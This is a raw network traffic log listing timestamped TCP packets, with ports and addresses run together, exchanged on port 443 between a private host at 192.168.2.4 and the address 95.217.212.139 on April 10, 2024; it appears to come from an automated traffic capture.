                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712889910 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712908983 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712965965 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712970972 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.712999105 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.713017941 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718117952 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718144894 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718189955 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718194008 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718215942 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.718236923 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.721987009 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722011089 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722057104 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722063065 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722093105 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.722106934 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.726960897 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.726979971 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727040052 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727044106 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727075100 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.727088928 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731348991 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731373072 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731411934 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731416941 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731441975 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.731457949 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735316992 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735336065 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735394001 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735404015 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.735440016 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739005089 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739023924 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739077091 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.739079952 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.825150967 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.825155973 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.825180054 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.825197935 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.827838898 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.827860117 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.827903032 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.827908039 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.827935934 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.827950954 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.830641985 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.830666065 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.830708027 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.830712080 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.830739021 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.830753088 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.834297895 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.834317923 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.834372044 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.834378004 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.834418058 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.837028980 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.837052107 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.837090969 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.837095976 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.837124109 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.837141991 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.839694023 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.839714050 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.839756012 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.839761019 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.839786053 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.839804888 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.842277050 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.842294931 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.842350960 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.842355967 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.842394114 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.845689058 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.845706940 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.845761061 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.845767021 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.845810890 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.848298073 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.848318100 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.848372936 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.848377943 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.848418951 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.850945950 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.850965977 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.851016998 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.851022959 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.851066113 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.853245974 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.853264093 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.853318930 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.853324890 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.853342056 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.853372097 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.856564999 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.856583118 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.856622934 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.856627941 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.856654882 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.856668949 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.859206915 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.859229088 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.859272003 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.859277010 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.859302998 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.859321117 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.861605883 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.861624956 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.861677885 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.861682892 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.861706972 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.861725092 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.864584923 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.864605904 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.864666939 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.864672899 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.864717007 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.867022038 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.867043018 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.867104053 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.867110968 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.867155075 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.869491100 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.869509935 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.869565964 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.869571924 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.869611979 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.871886015 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.871908903 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.871952057 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.871958017 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.871987104 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.872004986 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.874808073 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.874828100 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.874893904 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.874900103 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.934818029 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.934823036 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.934849977 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.934868097 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.936687946 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.936707020 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.936764002 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.936769962 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.936789036 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.936817884 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.938555002 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.938575983 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.938633919 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.938640118 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.938663006 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.938684940 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.940017939 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.940037012 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.940092087 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.940097094 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.940120935 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.940135002 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.942684889 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.942711115 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.942754984 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.942759991 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.942785978 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.942802906 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.944607973 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.944628000 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.944698095 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.944705009 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.944746017 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.946393967 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.946413040 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.946464062 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.946469069 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.946491003 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.946505070 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.949235916 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.949259043 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.949301004 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.949305058 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.949331045 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.949346066 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.951003075 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.951024055 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.951083899 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.951088905 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.951128006 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.953016996 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.953035116 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.953090906 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.953099966 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.953141928 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.954287052 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.954305887 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.954375029 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.954396963 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.954447985 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.956593037 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.956610918 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.956707954 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.956747055 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.956799030 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.958421946 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.958442926 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.958487034 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.958493948 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.958520889 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.958543062 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.960333109 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.960351944 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.960397005 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.960405111 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.960429907 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.960441113 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.962994099 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.963011980 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.963052034 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.963058949 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.963073015 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.963099957 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964320898 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964340925 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964392900 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964404106 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964410067 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964436054 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964447975 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964452982 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964482069 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964495897 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.964534998 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.965099096 CEST49753443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:25.965111017 CEST4434975395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:26.041949987 CEST49754443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:26.042032957 CEST4434975495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:26.042135000 CEST49754443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:26.042403936 CEST49754443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:26.042437077 CEST4434975495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:26.446814060 CEST4434975495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886287928 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886385918 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886456966 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886502981 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886842966 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.918991089 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919131041 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919287920 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919322968 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919553995 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941817999 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941886902 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941952944 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941983938 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.942013979 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.942034960 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964484930 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964560032 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964620113 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964652061 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964689970 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964708090 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983513117 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983591080 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983673096 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983695984 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983726978 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983757019 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002336025 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002407074 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002496004 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002542973 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002652884 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002911091 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021740913 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021816015 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021879911 CEST49758443192.168.2.495.217.212.139
